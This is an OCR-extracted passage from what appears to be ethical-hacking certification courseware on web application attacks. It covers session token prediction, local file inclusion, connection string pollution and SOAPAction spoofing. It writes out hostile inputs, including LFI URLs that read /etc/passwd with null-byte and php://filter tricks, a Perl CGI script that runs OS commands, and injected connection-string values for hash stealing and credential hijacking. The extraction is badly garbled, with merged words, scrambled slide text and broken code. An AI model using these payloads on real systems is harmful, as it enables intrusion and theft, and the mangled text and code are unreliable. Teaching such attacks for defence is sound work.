direct accessto server-sideAPIs.If there are any accesscontrolweaknesses in these
directaccess methods, an attackerc an exploit themandcompromise the system.
‘Attack
Restrictions
on HTTP Methods: It is important to test different
HTTP methods
suchas GET, POST, PUT,DELETE, TRACE, andOPTIONS. Theattackermodifiesthe HTTP
methodsto compromiseweb applications. If the web application acceptsthese
modifiedrequests, the accesscontrolscan be bypassed.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 |
AttackSessionManagement
Mechanism CEH
Atackors
(©
controls
breakan applications
a ndimpersonate
session management
prieged applicationusers
to bypass authentication
mechanism
the
Token Session

| Session
Tokens
Prediction
Generation. SessionTokensHandling

© Mani-the-MiddleAttack
©.SeaionTokens Tampering © SessionReplay

Hijacking
©Session

Attacking
SessionTokenGenerationMechanism

Encoding
‘Weak Example
hetpe://iw carts
¢iadhacker con/checkout?

© Obtainol d sesion
readinghexencoing,B a
tokens Session
Token
bysifingthe
ry 3 into
the
trafic
Prediction
or legimatl lagging an analy
application ifr

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Attacking SessionTokensHandling
Mechanism:
Session Token Sniffing

(©Sit theappiationeaticusing

2 sitingtoo suchasWireshark
BurpSuto

forsesson
tokens
andthe

Unouthoraed
aces otheo
the cookie gain
replay

Use
and Mani
to
session cookiesperform

the-dle atacke

Attack SessionManagement
Mechanism
Webapplication sessionmanagement involvesexchanging sensitive informationbetweenthe
server and its clientswhereverrequired. If suchsession management the attacker
is insecure,
can take advantage of it to attack the web application through the session management

Nowadays,
which
mechanism, is the keysecurity
most attackerstarget
component
application
i n most webapplications.

session management to launchmalicious

attacks
againstwebapplications, themto easily
allowing bypass robustauthentication
controlsand
masquerade as other users without even knowing their credentials(usernames,
passwords}.
Attackerscan even take controlof the entire application by compromisinga system
administrator's
account.
Session Attack
Management
a
Asessionmanagement

privileged
by
attackis methodused attackers
Attackersbreakan application's
application
controlsand impersonate
sessionmanagement
to compromise
mechanism to bypass
a web application.
the authentication
users. It involvestwo stages: session token

of andexploitation
‘generation
Togenerate
sessiontokenhandling,
engage i n the following:
a validsession token,attackers

Session TokenPrediction:Attackerscan do thiswhentheyrealizethat the server uses a

deterministicpatternbetweensessionIDs.Bysuccessfully gainingthepreviousandnext
session IDs of the user, the attackercan perform
maliciousattackspretending
to bethe
user.
SessionTokenTampering: Oncethe attackersgain the previousand next session ID,
theycan tamper
with the session data andengagei n furthermalicious
activities.

ical andCountermensores
Mackin ©by E-Comel
Copyright
Onceattackersgenerate sessiontokenhandling
a validsessiontoken,theytry to exploit as
follows:
‘+
Man-in-the-Middle(MITM) Attack:Attackersintercept communication betweentwo
systems on a network. They dividethe networkconnection into two: one betweenthe
clientandthe attacker, andthe otherbetweenthe attackerandserver, whichthen acts
as a proxyin the interceptedconnection,
SessionHijacking: Attackersstealthe user session IDfroma trustedwebsiteto perform
malicious
activities
SessionReplay: Attackersobtaintheuser sessionIDandthenreuse it to gainaccessto
the user account.
Attacking
Session
TokenGenerationMechanism
To determinethe session token generation attack,
mechanismi n a session management
attackersstealvalidsession tokensandthen predict
the next session token.
Throughsession prediction,
attackersidentifya patterni n the session token exchanged
betweenthe clientandthe server. Thiscan happenwhen the web application has weak,
predictable
session identifiers.For example, whenthe web applicationassignsa session token
sequentially,
attackersc an predict thepreviousandnext sessiontokensbyknowing anysession
ID.Beforepredictinga session identifier,attackers
haveto obtainsufficientvalidsession tokens
forlegitimate
system
users.
=
WeakEncoding
Example
Whenhex encoding date=08/01/2020,
an ASCIIstringuser=jason;app=admin; you can
predict
anothersession token byjustchanging
the date and use it for another
transaction with the server.
hetps://www.corti
fiedhacker .com/checkout?
SessionToken=%75¢73+65%72%30¢6At61473¥6F¢6E%3B%614
GE83B8648610744653003003802F93003142432430022830
Session
TokenPrediction
70870830861
86446086
Obtainvalid session tokensbysniffing the traffic or legitimately
logging
into the

©.
and
applicationanalyzing
or
any (hex
it for encoding
If any meaningcan be reverse engineered
encoding,
fromthe sample
Base64) pattern
of sessiontokens,
then
attempt to
guessrecently
other
the tokens
application
issuedto users

© Makea large
a requests
with
numberof predicted
to the
page to determine validsession token
tokens a session-dependent

Attacking Session
TokensHandling Mechanism:SessionTokenSniffing
First,sniffnetworktrafficforvalidsessiontokensandthenuse themto predict
thenext session
token,Usethe predicted
sessionIDto authenticatewith the targetweb application.
for session tokensniffing
Thesteps are as follows

ical andCountermensores
Mackin ©by E-Comel
Copyright
 trafficusinga sniffing
Sniffthe application tool suchas Wireshark
or an intercepting

proxy being
suchas Burp
If HTTPcookiesare
Suite
used as the transmission mechanism for session tokensand
the secure flagis not set, then try to replay
the cookieto gain unauthorizedaccessto
the application
Use
‘Thus,
sessioncookies
to session
perform
the validsessiontokenis important
sniffing
hijacking,
attacks
in sessionmanagement
andMITM attacks
sessionreplay,

+
Wireshark
Source:https://www.wireshark.org
Wiresharkis a network protocol
analyzer
that allows attackersto captureand
browsenetworktraffic. Wireshark
interactively captureslive networktraffic from
Ethernet,
IEEE802.11,PPP/HDLC,
ATM,Bluetooth, USB,TokenRing, Frame Relay,and
thus helping
FDDInetworks, attackerssniffsessionIDsin transit to and from a target
web application,

fle EOt View Go Cope AnoimeStitis Telephony

Wier ToolsHep
A4uc@oDRe =J=
ome
Soabsa0<fecdectocie
WTTP
4 GET
“J
Epreion. +

|
/inages/aaliCslider_arrowspng
40.30.40.43 $0:10.30.19 RTTP/4.1.(application/i
WYP
40.i0.40.1410,40.10.39__NITP__
4 P09T/andex.anpx
WTP/i-a
i . Post /index aspxNITP/4-4_(applieation/xcw

>
[Timestamps]
T e Ppayloed(436bytes)

SRGPua
deme SG
on
Bike
©7
HTTP
Cooke t-ooke A2bytePackets:1033.Displayed
53(51%)Dropped
00.0%) Profle Deft

ical andCountermensores
Mackin ©by E-Comel
Copyright
 |
PerformInjection/Input
ValidationAttacks EH
¢
normal
appiation’sintended
ue

Sa injection Flenjecton

PerformLocalFile Inclusion (LFT)

{©LocaFleinlsion (1) vulnerabities
enableattackers

©Antf vsnerbly occurs wen an application

the atackertomodify
adds
theinputandembedpath
to addthel own

traversalcharacters
filesonaserver
of inputs,
l eswithoutpropervalidation
ia

thereby
aweb
browser

enabling

Evade
added
and
other php exten phpexecution
Bypassing

= este 6 cort"page'
Secshee osehr 2

ep:re cola pepoagecr: 2538

rrr
PerformInjection/Input
ValidationAttacks
Injectionattacksare very common in web applications. Theyexploitthe vulnerableinput
validationmechanism implemented bythe webapplication. Thereare manytypesof injection
attacks,suchas web scriptinjection,
OScommandinjection, SMTPinjection,LDAPinjection,
andXPathinjection.Anotherfrequentlyoccurring attackis a n SQL attack.
injection

ical andCountermensores
Mackin ©by E-Comel
Copyright
 frequently
Injection takesplace whena browsersendsuser-provided
data to the interpreter
as
partof a commandor query. For launching attack,
an injection attackerssupply crafteddata
thattricksthe interpreter
into executing unintended commands of these
or queries.Because
Injectionflaws,attackerscan easilyread,create,update, and remove any arbitrarydata
to theapplication.
available In some cases,attackerscan even bypassa deeplynestedfirewall
environment andtakecomplete controlof the application
andits underlying
system.
Attacks/Input
Injection ValidationAttacks
To perform craftedmaliciousinput that is syntactically
injectionattacks,supply correct
according
to the interpreted
language
being usedto breakthe application's
normalintended
operation
Somewaysto perform attacks
injection a re describedbelow:
=
WebScripts Injection:If the user inputis usedinto dynamically
execute code,
enter
craftedinputthat breaksthe intendeddata context and executes commands on the
server

Injection:
0S Commands Exploit operating byentering
systems maliciouscodein input
fieldsif
applications
utilizea
SMTPInjection:
i n system-level
user input

Injectarbitrary
command
SMTPcommandsinto applications
and SMTPserver
conversationsto generatelarge
volumesof spamemail
SQLInjection: Enter a series of maliciousSQLqueriesinto inputfields to directly
manipulatethe database.
LDAPInjection:Takeadvantage of non-validatedwebapplication inputvulnerabilitiesto
passLDAPfiltersto obtaindirectaccessto databases.
XPathInjection:Entermalicious stringsi n inputfieldsto manipulate
the XPathqueryso
that it interfereswith the application's
logic.
BufferOverflow:Injecta large
amount of bogus
data beyond
the capacity
of the input
field
File Injection:
Injectmaliciousfiles byexploiting
“dynamic
file include―
mechanisms
in
webapplications.
Canonicalization: variablesthat reference
Manipulate (./)"to
fileswith “dot-dot-slash
access restricteddirectoriesi n the application
Note: For complete
coverageof SQLinjection and techniques,
concepts refer to Module 15
SQLInjection
PerformLocalFileInclusion(LF!)
Localfile inclusion(LF)vulnerability
enablesattackersto addtheir own fileson a server via a
webbrowser.Suchvulnerability ariseswhenan application addsfileswithout propervalidation
of inputs,thereby enabling
the attacker to modifythe input and embed pathtraversal
characters.

ical andCountermensores
Mackin ©by E-Comel
Copyright
LEIvulnerability
is oftentriggered in PHP-based
websites.Simple PHPcodesusceptible to LFIis
into require()without proper validation,
given below.Attackerscan insert the URLparameter
$file
require
=GET[‘page’];
$
($file) ;

In this case, a n attackercan just insert this stringand fetchthe /ete/passwd

file usingthe
following
URL:
http: //xyz.com/page=../../../../../../ete/passwa
Evade

general,
In
ofthe
added.php

extensions
using
andotherextensions file

code
file
follows:
are added PHP as

=$_GET[
$file
require ($file
‘page’];
php");
Now,phpis appended to thefilename, whichmeans the user cannot findthe required
file becausefile /etc/passwd.php doesnot exist. If a n attackertries to insert null
bytes (#00)at theendof the attackstring,the .phpcan be easilyevaded:
http: //xyz.com/page=../../../../../../etc/passwds00
Anothermethodto evadethe addedphpis to add a question mark(2)to the attack
string:
http: //xyz.com/page=../../../../../../ete/passwd?
Bypassing
.phpexecution
LEIvulnerability
server
can read.txt filesbut not
and their file-ending .php
files because bythe
theyare executed
comprisessome code,Thiscan be evadedusing a built-in

php as
filter follows:
//xyz.com/index.php?page=php:
http:
encode/resource=index
//filter/convert .base64~

Here,the phpfilter is usedto convert everything

into the Base64format. Now,the
entire page is Base64-encoded,which can be decodedand savedin a text file and
executed:
base64 -d savefile.php

ical andCountermensores
Mackin ©by E-Comel
Copyright
 AttackApplication
LogicFlaws
(©Most sppliation
flawsoccu due tothe neghgence
andfale assumptions
ofwebdevelopers
“©:
Completely
|G.Use
examine

too
BSuite
urp to thewebapplications

manipulate
requests
tothe
web
applieations
to the
ident lol lawsforexploitation

Retail
ApplicationWeb LogieFlawExploitation
Scenario

aw J*

Attack Application
LogicFlaws
In all web applications,
a vast amount of logic
i s applied
at everylevel.Theimplementation
of
some logic
can be vulnerableto various attacksthat will not be noticeable.Most attackers
mainly focuson high-level
attackssuchas SQLInjection, and XSSscripting, since they have
easilyrecognizable
signatures.Bycontrast,
application logicflawsare not associatedwith any
common signatures,making logic
the application flawsmore difficultto identify. Manually
testingof vulnerability this typeof flaw,whichenablesattackersto
scanners cannot identify
exploit
suchflawsto cause severe damageto theweb applications.
Most application
flaws arise from the negligence of developers.
andfalseassumptions
Application
logicflawsvary among differenttypesof web applications
andare not restrictedto
a particular
flaw. Acquiringknowledge on previouslyexploited
applications
with common logic
flawscan provide informationon how to approach
appropriate exploiting
flawsi n application
logic.
A common scenario the exploitation
illustrating of application
logicflaws by attackersis
describedbelow:
Scenario:
Identify
exploit
logic
and
flaws
applications,
In most retail web
retail
applications
placing
in
selecting
the processof
web
an orderincludes the
product,
finalizing
the order,
providing details,
payment and providing
delivery
details.
Thedeveloper assumesthat any customer wouldfollowall thelevelsi n a sequence as
designed. Identify suchapplications,and usingproxytoolssuchas Burp Suite,attempt
to controlthe requests sent to the web application.
Furthermore,attempt to bypassthe
third stage,i.e., jump from the secondstageto the fourth stagebymanipulating the
requests.Thistypeof attackis calledforcedbrowsing. Thisflawenablesthe attacker
to
ical andCountermensores
Mackin ©by E-Comel
Copyright
avoid payingthe product price and receive the productat the delivery address.It can
resulti n severe financiallossesif an attackerintendsto exploit
it on a large
scale.

oo
Â¥ (rate on

Normal
User rosea
icons
smear

corns
98
|| attacker

Figure
14.75:
Screenshot
displaying
webapplication
ogi aw exploitation

ical andCountermensores
Mackin ©by E-Comel
Copyright
 AttackSharedEnvironments

| Focexampl,amas cet
of
the
{ppaton, or clent may ployprovider
may
to of
vulnerable
service te cmoronie
webapglationthatexposes
the secant antherorgans
a ndcompromises
the wed spoiaton web
of

[tacks betweenapplications

Attack Shared Environments

Nowadays, leverage
organizations third-party
service providers
for hosting
and maintaining
theirwebapplications Theseservice providers
andrelevantwebinfrastructure, provideservices
to multiple clientsandhosttheir webapplications
parallelly
usingthesame infrastructure.This
approach
tomanyand
leads
attacks
threats
clientof theservice provider
application
against
maytryto compromise
or a client may deploy
web applications.Forexample,
of another
the security
a vulnerableweb application
a malicious
organization's
web
that pavesthe way to
compromise
following
The
webapplications.
otherorganizations’
performed
attacksc an be on sharedenvironments:
=
Attackson theaccessmechanism
The application service provider
providesan administrativeweb interface to the
organizationsfor configuring
andmanagingthewebapplication andits database from a
remote location.Thisremote accessmechanismis vulnerableto various attacks.
© Checkwhetherthe remote access hasany unpatched
mechanism vulnerabilitiesor
configuration
errors that can beexploited. exploit
Attackers suchvulnerabilities
to
credentials
capture andgain access to theweb application
andits database
Checkwhetherthe access privileges are properly separatedbetweenclients.For
‘example,
2 poorconfiguration maygive customersshella ccessinstead offileaccess.
Thismayallowattackersto access sensitive filesanddatastoredon the webservers.

ical andCountermensores
Mackin ©by E-Comel
Copyright
Attacksbetweenapplications
i n one web application
Vulnerabilitiesexisting mayallowattackersto execute malicious
scripts
andcompromise the security
following
of otherhostedweb applications.
scriptallowsattackersto executecommands remotely:
For example,
the
#1/usr/bin/pert
use strict,
use

print
CGT qu(:standardescapeHTâ„¢L)
header, start_html(*―)
;
if
(my
(param()) Sconmand =
param(*cnmd―)
;
;};
Sconmand="$command*
print “$command\n―
else (print start_form(); textfield
print end_html;
("command")
;}

Byaccessing scriptover the Internet,

the abovementioned attackerscan execute OS
‘commands
suchas whoamn.
Furthermore,a vulnerablewebapplication
can beexploited
to compromise thesecurity
of otherweb applications. an SQL
Forexample, vulnerability
injection i n one application

mayallowattackers to run arbitrary

SALcommands andqueriesto retrieve datai n the
sharedenvironment andmanipulatethedataof otherapplications.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 j
AttackDatabaseConnectivity EH
Database
connection Y oconnectappiations
are used
strings engines
to database
{Example
ofacommon connection used to
string connet toa MierosoltSO Serverdatabase:

Database
connectity tacks exploit
theway applications
connect the taba instead
of abusing
database

‘Types of DataConnectivity
Attacks

EE crrecion stingetn
B
VY
EEcerecionsuin Parmeter
Poon
(3)
Ata
Comecion
Fo
bs
ConnectionString
Injection
Inacharacterinastring
1@ delegated
semicolon by
appending
authentication
environment
inletpaamaters connection ther wth he

Ader
Injection

Module4 1882
Page ical andCountermensores
Mackin
©
by
Copyright E-Comel
 |
ConnectionString
ParameterPollution (CSPP)
Attacks CEH
values
\@ Trytooverwrite parameter intheconnectionstringto steal ver IDsando hijackwebcredentials

HashStealing Port Scanning Hijacking

Web Credentials

ConnectionPoolDoS

“a.
Baamine
ofthe large
theconnectionpooling
settings appleation,
Sat query andrun mutplequeres multaneously
construct malisous
to consume alleannectonsinthe

database
fal
poo,ausng
‘connection queriest forlegitimateusers

@ Example:
1
the
default
ImASPNET maximum allowed
connectonsinthepoolare 200andthe

cnscoaeconpol
scone aia Dost
pve
aes
tom
seng
ne©)
Attack DatabaseConnectivity
Databaseconnection stringsare usedto connect applications
to databaseengines.In these
attacks,attackerstarget a databaseconnection that formsa link betweena databaseserver
and its client software.A web application establishesa connection with the databaseby
providing a driverwith a connection stringthat holdsthe addressof a specificdatabaseor
server andoffers
instanceanduser authentication
credentials

ical andCountermensores
Mackin ©by E-Comel
Copyright
For
example
Server=sql_box; Database=Common;
User ID=uid; Pwd=password
Attacking can resultin unauthorizedcontrolover thedatabase.
data connectivity Attackso n
provide
data connectivity attackerswith access to sensitive databaseinformation.Database
attacksexploit
connectivity the way i n whichapplications connect to thedatabaseinsteadof
abusing
queries.
database
For this purpose,use methodssuchas connection string hashstealing,
attack,
injection port
andhijacking
scanning, webcredentials.
Thefollowing example
is an of a common connection stringusedto connect to a MicrosoftSQL
Server
database:
“Data Source=Server,Port; Network
©
Library=DBMSSOCN; Initial.
Catalog=DataBase;
User ID=Username;Password=pwd;―
Data connectivity of the following
attacksare types:
Connection String Injection:In a delegated
authenticationenvironment,attackers inject
i n a connection stringby
parameters appendingthemwith a semicolon. Thiscan occur
dynamic
‘when stringconcatenation is usedto buildconnection stringsaccording
to the
user input.
ConnectionString
Parameter Pollution (CSPP)
Attacks:Attackersoverwrite parameter
values
inthe connection string,
ConnectionPoolDos:Attackersexamine the connection pooling settingsof the target
application,
construct a large malicious SQL query, and run multiple queries
simultaneously
to consume all the connectionsin the connection pool,causingdatabase
queries
tofor users.
Connection
fal legitimate
StringInjection
A connection stringinjectionattackoccurs whenthe server usesdynamic stringconcatenation
to build connection strings
basedon the user input.If the server doesnot validatethe string
and does not allowthe malicioustext or charactersto escape,a n attackercan potentially

a semicolonand appending
connection stringusing the “last
For
access sensitive dataor other resources on the server.
attackbysupplying
example,an attackercouldmount an
an additionalvalue.Theattackerparsesthe
one wins" algorithm andsubstitutesa legitimate
valuewith a
hostileinput.
The connection stringbuilderclasses can eliminateguesswork and protectthe server from
syntaxerrors and security vulnerabilities.Theyprovide methodsand propertiescorresponding
to known key/value pairs permitted byeachdata provider. Eachclassmaintains a fixed
collectionof synonyms and can translatea synonym into the corresponding well-knownkey
name. The server checks forvalidkey/value pairsand an invalidpair throwsan exception.In
addition,it handlesthe injected
valuesi n a safemanner.
‘The
attackerscaneasily
injectparametersbysimply adding a semicolon(";―)
usingconnection
techniques
stringinjection i n a delegated
authenticationenvironment,

ical andCountermensores
Mackin ©by E-Comel
Copyright
In the followingexample,the systemasksthe user to give a username andpassword for
creating Here,
a connection string. the attackerenters the password
as "pwd; Encryption=off―;
thismeans that the attackerhasvoidedthe encryption Whenthe connection stringis
system.
populated, the encryptionvaluewill beaddedto the previouslyconfigured
set of parameters.

Connection ParameterPollution(CSPP)
String Attacks
Theserver uses connection stringsto connect applicationsto databaseengines. Connection
stringparameter (CSPP)
pollution techniques allow a n attackerto specifically exploitthe
semicolon-delimited databaseconnection stringsthat are constructeddynamically basedon
the user inputs fromweb applications.
In CSPP attacks,attackers
overwrite parametervaluesi n the connection stringto stealuser IDs
andhijack
webcredentials.
HashStealing
Replaces thevalueofthe DataSourceparameter with thatof a Rogue MicrosoftSQL
Serverandsetsthevaluesof username,datasource,andintegrated security as follows:

User_Value:
Security = true
Thus,
;

the resulting
Data Source =
Rogue
Server
Value: Password ; Integrated

connectingstringwouldbe:
Data source =
myServer; initial

Here,the parameters
=
catalog dbl; integrated security=no;
jogue Server; Password=; Integrated Security=true,
"DataSource" are overwritten. Thus,
and"IntegratedSecurity― the
application’s
built-indriverswill use the lastset of valuesinsteadof the previousones.
Now,whenthe Microsoft SQLServertries to connect to the rogueserver, the sniffer
runningin the rogueserver sniffsthewindow'scredentials.
Port Scanning

Tryto connect to differentportsbychanging

thevalueand seeingthe error messages
obtained,
Inject
Password
;
User_Value:Data
Value:
Source
Integrated Security
;
=Target_Server,
=
Target_Port
true

Theresulting
connection stringwouldbe:

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Data source =
myServer; initial catalog = dbl; integrated securitysno;
Data SourcesTargetServer, Target Port; Pa Integrated

Here,the connection stringwill takethe last set "DataSource" the web

parameter;
application
will tryto connect to the "TargetPort―
porto n the "TargetServer―
machine.
Thus,you can perform a portscan bynoticing
different
error messages.

Hijacking
WebCredentials
Tryto connect to the databaseusing the web application systemaccount insteadof a
user-provided
Inject
set
ofcredentials.
User_value:Data Source ;
=Target_server
PasswordValue: Integrated Security true
Theresulting
;

connection string
is:
=
Data source

Security=true:
=

Data
myServer; initial catalog
= dbl; integrated security=no;
Source=TargetServer, Target Port; Password=;Integrated

Here,it overwrites the "integratedsecurity" parameter with a valueequal to “true.―

Thus,it will allowyou to connect to the databasewith the systemaccount with which
thewebapplication
runs.
ConnectionPoolDos
Examinethe connection poolingsettingsof the application, maliciousSQL
construct a large
query, and run multiple queriessimultaneously to consume all the connections i n the
connection pool,
causingdatabasequeriesto fail for legitimate
users.
Forexample, bydefault,i n ASP.NET, the maximum numberof allowedconnectionsi n the pool
is 100 andthe timeout is 30 seconds. Thus, run 100 querieswith an execution time of 30+
seconds within 30seconds to causea connection poolDoSsuchthat no one elsewouldbeable
to usethe database-related partsof the application.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 AttackWebApplication
Client

in
(©Interacwthserversdeapplications
users andaccess unauthorized
data to
waysperform
unexpected malicious
actions
agains
the end

BDcoosssitescrnting Byredirectionatacts
BLete injection
eader BBFrame
jection
Forgery
Request

Attacks
tack Sesslon
Faton

ActiveXAttacks
Privacy

Attack Web Application

Client
Attacksperformed application
on a server-side application
infecttheclient-side whenthelatter
interacts with maliciousservers or processes
maliciousdata.Attackson the clientside occur
whentheclientestablishes withtheserver. If thereis n o connection between the
a connection
clientandthe server, thenthereis no risk,
becausethe server cannot passmalicious
datato the
client.
Considera client-side webpagetargetsa specific
attacki n whichan infected browserweakness
and exploits
it successfully.
Consequently,
the maliciousserver gains unauthorizedcontrolof
the clientsystem.Attackersinteract withthe server-sideapplications
i n unexpected
waysto
perform maliciousactionsagainstthe endusers andaccess unauthorizeddata.
Someof the methodsthat attackersuse to perform
malicious
attacksare discussed
below.
=
Cross-site An attackerbypasses
Scripting: theclients’ mechanism,
ID'ssecurity obtains
access privileges,
and then injectsmaliciousscriptsinto the web pagesof a website,
Thesemalicious can even rewrite the HTMLcontent of thewebsite.
scripts
HTTPHeaderInjection: Attackers splita n HTTPresponseinto multipleresponses by
injectinga maliciousresponse i n an HTTPheader.Thus,theycan defacewebsites,
poisonthecache, andtriggercross-sitescripting,
Request Forgery Attack: In a requestforgery attack, the trust of a
attackersexploit
websiteor web application on a user'sbrowser.Theattackworksbyincluding a link on
page,whichtakesthe user to an authenticatedwebsite.
‘a

PrivacyAttacks:A privacyattackinvolvestracking performedwith the helpof a remote

site byemployinga leakedpersistent browserstate,

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Attacks:Attackersdevelop
Redirection codeand linksthat resemble
a legitimate
site
that a user wants to visit; however,the URLredirectsthe user to a malicious
websiteon
whichattackers could potentially obtain the user’s
credentials andother sensitive
information.
Frame Injection:
Whenscripts do not validatetheir input,attackersinjectcodethrough
frames,Thisaffectsall the browsersand scripts that do not validateuntrustedinput,
Thesevulnerabilitiesoccur i n HTML pageswith frames.Another reason for this
vulnerability
is thatwebbrowsers
supportframeediting,
SessionFixation: Sessionfixation helpsattackershijackvalid user sessions. They
authenticatethemselves
usinga knownsession ID andthen use the knownsession ID to
hijack s ession.Thus,
a user-validated attackerstrick users and accessa genuineweb
server
using
existing
session
‘ActiveX
an

Attacks:Attackers
ID value.
lurevictims via emailor via a linkthat is constructedsuch
of remote execution codebecomeaccessible,
that the loopholes allowing the attackers
to obtainaccessprivileges
equal to thoseof authorized users.

ical andCountermensores
Mackin ©by E-Comel
Copyright
AttackWebServices
CEH
business
and
spplieations onawil
iogi orattacks
12We services work atoplegacy
webapplations
ulerabiiies
a ndanyattack webserce
various
mediatelyexposean undering

WebServicesProbing
Attacks

ofthe
andKsentry
points,
applston

et aes
erty functions, andmessage

Schema
can
beIn
Sthe
we estsby selecting of operations
a
andformulating scoring
requestmessages
the XML that submited service
(0 Use
include OAP
andto
theverequests
ta
gan mals content request analas errs deeper

&
WebServiceAttacks:SOAPInjection
(©Injectm atiious querystringnthe user inputel d to bypasswebservices authentication
mechanisms
and
access backend
databases
(©.Thistack
works
SOL
Injection
attacks
salto

Spoofing
WebServiceAttacks:SOAPAction
‘Ws-Rtiacker

isonet byth
‘hat
ince asthefet cl element the

operations
(a aches usetol suchae WS-Atacherto
late the nudedinthe

recounet
 |
WebServiceAttacks:WS-AddressSpoofing CEH
WS-addres
sdby
fhe
information
rather
the
thetach
tothe

than adress

SOAP
Regular
WS talc between clint andserver
SOAP
tlcreceived
‘nrequested
by
WS cent

WebServiceAttacks:XMLInjection

Inject user XML

1@ xt
schema
or
populate
data ad
gus entrles XML
database
tagsnto inputfils tomanipulate with
 WebServicesParsing
Attacks
CEH
|@ Parsing
toeeate
exploit
attacks vulnerabilties

or
andweaknesses

in parser
wservice
attack generatelgialerors
a deniatof-service

eb
request
capabilites
n the processing

processing
ofthe XML

RecursivePayloads Payload
‘Oversize

orect SOAP documentthatcontin infinite Consume aleystem w=

resources,rendering
Lopsreultngn exhastionof the
[processing
DM parsera nd CPU
resources,

WebServiceAttackTools

SoapUt xutspy| Sine

Pro

taster
meeps
(©toes Msp sth ML tor nd

Attack WebServices
Web
applications
integrated
vulnerable,
services
implement
particular
functionality.
oftenuse web
within the web applications
allowing
to
are vulnerable,
attackersto exploit
a
the applications
suchapplicationsthrough
themselvesbecome
the integrated
vulnerable
Ifwebservices

web services. Thus, attackerseasily

targetwebservices. Therefore,
compromisedweb services
threat.
are a serious security

ical andCountermensores
Mackin ©by E-Comel
Copyright
 web applications,
Webservices work atop the legacy and any attackon web service will
immediately expose an underlyingapplication’s
business and logicvulnerabilitiesfor various
attacks.Attackers can targetweb services usingvarious techniques,as web applications make
these services availableto users through different mechanisms. Hence, the possibility of
increases. Attackersexploit
vulnerabilities thesevulnerabilities
to compromise web services.
Thereare many reasons whyattackerstargetweb services. Attackerschoosean appropriate
attackdepending on the purposeoftheattack. merely
If attackers want to stopa webservice
fromserving intendedusers,then theycan launcha
DoS
attack requests.
bysending
numerous

~
> drab
Toes

‘Web Probing
Services Attacks
WSDLfilesare automateddocumentsconsisting of sensitive informationabout service ports,
connections formedbetweentwo electronicmachines, and so on. Attackerscan use WSDL
probing attacksto obtain informationabout the vulnerabilitiesin publicand privateweb
services,as well as to perform
an SQLattack
Awebservice probing attackinvolvesthe following
steps:
=
In the firststep,trapthe WSDLdocumentfromweb service trafficand analyze it to
determinethe purposeof the application, functionalbreakdown, entrypoints,and
message types
Createa set of valid requests byselecting a set of operationsand formulating the
requestmessages accordingto the rulesof the XML schema that can be submittedto
the webservice
Usetheserequests
to includemalicious
contents i n SOAP andanalyze
requests errors to
gaina deeper
understanding
of potential
securityweaknesses

ical andCountermensores
Mackin ©by E-Comel
Copyright
&
Figure Probing
14,78;Web Services atack

WebServiceAttacks:
SOAPInjection
SOAP is a lightweightandsimple
XML-based designed
protocol to exchange structuredandtype
informationo n the web.The XML envelope elementis always the root elementof a SOAP
message i n the XML schema.
SOAPinjection special
includes characters suchas singlequotes,
doublequotes, semicolons,
andso on.
attackerinjectsmaliciousquery stringsi n the user inputfield to bypass
‘The web service
authenticationmechanisms and accessbackenddatabases. to SQL
Thisattackworkssimilarly
attacks.
injection
Server Response
AccountLogi

igure14.79:We Services
Soap
Injectionattack
Spoofing
WebServiceAttacks:SOAPAction
Every SOAPrequest message contains an operation bythe application
that is executed and is
includedas the first childelementin the SOAPbody. WhenSOAPmessages are transmitted
UsingHTTP, a n additionalHTTP headerknownas SOAPActionis used.The operationto be
executedis includedin the SOAPAction header.Theheaderelementinformsthe receivingweb
service about the operationpresenti n the SOAPbody without the need to perform XML
parsing.Attackerscan exploit to manipulate
this optimization the operationsincludedin the
SOAPActionheaders.
For example,
considera web service that includestwo operations,
createUserand
deleteallUsers,
and is vulnerableto suchan attack.Assumethat thisweb service is protected

ical andCountermensores
Mackin ©by E-Comel
Copyright
bya gatewayandonlyauthorized
users whohavedirectcommunication with thewebservice
perform
can the deleteAllUsers An attackeri n front of the gateway
operation. can perform
a
spoofing
SOAPAction attackbymanipulating
theSOAPAction header asfollows:

messagecreating
AnHTTPrequest
POST /service HTTP/1.1for auser:
Host: certifiedHacker
SOAPAction: "createUser"
<Envelope>
<Header />
<Body>
<createUser>
<login>rinnimathews</login>
<pwd>password</pwd>
</createUser>
</Body>
</Envelope>
Theattackercan modifythe SOAPAction to “deleteallUsers―,
and the gatewaypassesthis
messagebecausethe SOAPbodyconsistsofthecreateUser
operation,
POST /service HTTP/1.1
Host: certifiedHacker
SOAPAction: "deleteAllUsers―
<Envelope>
<Header />
<Body>
<createUser>
<login>rinnimathews</login>
<pwd>password</pwd>
</createUser>
</Body>
</Envelope>
to perform
Attackersuse toolssuchas WS-Attacker spoofing:
SOAPAction
=
WS-Attacker
Source:https://github.com
is a tool for performing
Ws-Attacker
andeasy-to-use
open-source
tests of
automatic penetration
softwaresolutionwithmultiple
plugins web
services. Itis an
for differentattack

ical andCountermensores
Mackin ©by E-Comel
Copyright
 types,and it provides checking
a security interface, functionality
provides
WS-Attacker
to loadWSDLfilesandsendSOAPmessagesto the web service endpoints
andcan test if
any webservice is vulnerable
to attacks
suchas XML signature
wrapping,SOAPAction
spoofing,
andDoS.

fee pa

18.80:ScreenshotofWS-Attacker
Figure
Spoofing
WebService Attacks:WS-Address
provides
‘Ws-Address additionalroutinginformationi n the SOAPheaderto support
asynchronous
communication. Thistechnique allowsthe transmissionof web service requests
andresponsemessagesusingdifferentTCPconnections. It is essentialfor long-running
service
wherethe calculationtime of the server-sideapplication
requests exceedsthe lifetimeof a
TCP
single connection,
‘WS-Address includes an optional FaultToaddresselementfor statingan alternativeendpoint
that is to be usedi n case of any complications. Asthe requesterselectsthe endpointaddress
usedi n the ReplyTo and FaultToheaders, it is not securedproperly againsttamperingby
intermediaries. Although the specification
asksto perform digital on theseheader
signatures
fields,the values mostly depend on thedefaultsetting without anypropersecurity.
Thiscausesa vulnerability that can be exploited bythe attackerto perform the WS-Address
spoofing attack. In the WS-address spoofing attack,an attackersendsa SOAPmessage
ical andCountermensores
Mackin ©by E-Comel
Copyright
 fakeWS-Address
containing information
to the server. The<ReplyTo>
headerconsistsof the
addressof the endpoint
selectedbythe attackerinsteadof theweb service client.Theendpoint
selectedbythe attackerreceives unnecessary trafficvia SOAPmessages. Furthermore, the
a massive amount of traffic,
attackermay generate thusresulting
